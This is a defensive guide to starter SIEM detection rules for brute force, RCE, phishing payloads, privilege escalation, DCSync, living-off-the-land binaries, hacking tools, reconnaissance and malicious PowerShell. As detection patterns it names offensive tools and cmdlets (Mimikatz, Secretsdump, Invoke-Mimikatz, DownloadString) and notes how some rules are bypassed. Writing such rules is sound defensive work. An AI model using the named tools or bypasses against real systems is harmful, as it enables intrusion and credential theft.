Essential SIEM Rules to Start With

No activity outside business hours rules, no password policy modification rules, or other actions irrelevant to real-time threat detection.

---

Credential-Based Attacks

Detect bruteforce attacks (repeated failed logins to a single account) and password spraying (one password tested across multiple accounts).

Why: Common initial access vectors due to weak credentials.

Coverage:

• OS/Apps: Windows (AD), Linux, cloud services (AWS/Azure).

• Events: Logon failures (Windows Event ID 4625), successful logons (ID 4624), user_start/user_login syscalls.

• Logic: Threshold-based alerts (e.g., ≥5 failed logins/minute from a single IP).

Improvements:

• Trigger alerts for successful logins after multiple failures.

• Differentiate brute-force (single account) vs. spraying (multiple accounts).

• Reduce false positives:

  • Exclude service accounts with expired passwords.

  • Split by application type (e.g., email clients often trigger false alerts).

---

Remote Code Execution (RCE)

Detect exploitation of code execution vulnerabilities, regardless of the specific CVE.

Coverage:

• OS: Windows, Linux.

• Events: Process creation (Windows Event ID 4688, Sysmon Event ID 1/11; Linux execve/open syscalls).

• Logic:

  • Suspicious parent-child process chains (e.g., w3wp.exe → cmd.exe).

  • Code execution by service accounts (e.g., www-data, apache).

  • Web-shell creation in web directories (e.g., .php, .aspx files).

Improvements:

• Use whitelists for legitimate application behaviors.

• Split into sub-rules:

  1. Abnormal process sequences.

  2. Service account anomalies.

  3. Web-shell file creation.

---

Phishing Payload Execution

Focus on post-exploitation behavior rather than email analysis.

Coverage:

• OS: Windows.

• Events: Process creation (Event ID 4688, Sysmon 1).

• Logic:

  • Office apps (e.g., winword.exe) spawning shells (cmd.exe, powershell.exe).

  • Processes downloading/executing external payloads.

Limitations:

• Misses password-protected ZIP/RAR payloads.

• Bypassed via indirect execution (e.g., some macros break the process chain).

Improvements:

• Monitor Office apps writing executables to disk.

---

Privilege Escalation

Detect transitions from user to SYSTEM/root privileges.

Coverage:

• OS: Windows.

• Events: Process creation (Event ID 4688, Sysmon 1).

• Logic:

  • User-context parent process spawning SYSTEM-level child (e.g., juicypotato.exe, print spooler exploits).

Unix Variant:

• Monitor auid (original user) vs. euid=0 (root execution).

Limitations:

• Misses privilege escalation via service creation. Or any other indirect execution.

---

DCSync Attacks

Detect unauthorized replication of AD database via Mimikatz, Impacket Secretsdump or similar tools.

Coverage:

• OS: Windows (Active Directory).

• Events: Directory Service replication (Event ID 4662).

• Logic:

  • Replication requests from non-DC hosts or non-admin accounts. The logis is well-known. Here is the example.

Improvements:

• Monitor changes to replication-permitted groups (e.g., Domain Admins).

• Baseline legitimate DC-to-DC replication traffic.

---

Living Off the Land (LOLBAS/GTFOBins)

Detect abuse of trusted binaries (e.g., certutil.exe, bitsadmin).

Coverage:

• OS: Windows, Linux.

• Events: Process execution logs.

• Logic:

  • Command-line patterns matching LOLBAS/GTFOBins techniques.

Improvements:

• Categorize alerts by tool type (e.g., "Lateral Movement", "Data Exfiltration").

• Windows LolBas: https://lolbas-project.github.io/ Unix GTFObins: https://gtfobins.github.io/

---

Hacking Tool Detection

Flag known security tools (e.g., Mimikatz, Cobalt Strike, Metasploit).

Coverage:

• OS: Windows, Linux.

• Events: Process creation, command-line arguments.

• Logic:

  • Match process names, hashes, or CLI patterns against threat intel feeds or CLI patterns matching tools like PowerSploit, Empire.

---

Host Reconnaissance

Detect post-compromise discovery commands (e.g., whoami, nslookup).

Coverage:

• OS: Windows, Linux.

• Events: Process execution logs.

• Logic:

  • Commands associated with TTPs from MITRE ATT&CK® TA0007.

  • Commands from Red Team cheat sheets.

Improvements:

• Prioritize commands run by non-admin users in sensitive directories.

---

Malicious PowerShell Activity

Detect offensive cmdlets (e.g., Invoke-Mimikatz, DownloadString).

Coverage:

• OS: Windows.

• Events: PowerShell script block logging (Event ID 4104) or Cmdlets (Event ID 4103).

• Logic:

  • Match cmdlets against frameworks like PowerSploit, Empire.

Improvements:

• Flag obfuscated commands (-EncodedCommand).

• Look for suspicious Cmdlets (Invoke-WebRequest)

---

Key Considerations

• Whitelisting: Exclude benign activity (e.g., admin scripts, 40k daily alerts = useless).

• Log Coverage: Ensure critical systems (DCs, cloud workloads) feed logs to SIEM. No logs, no detects.

• Tuning: Start broad, then refine rules using real-world data.

Let me know if you need deeper specifics on any rule! 🔍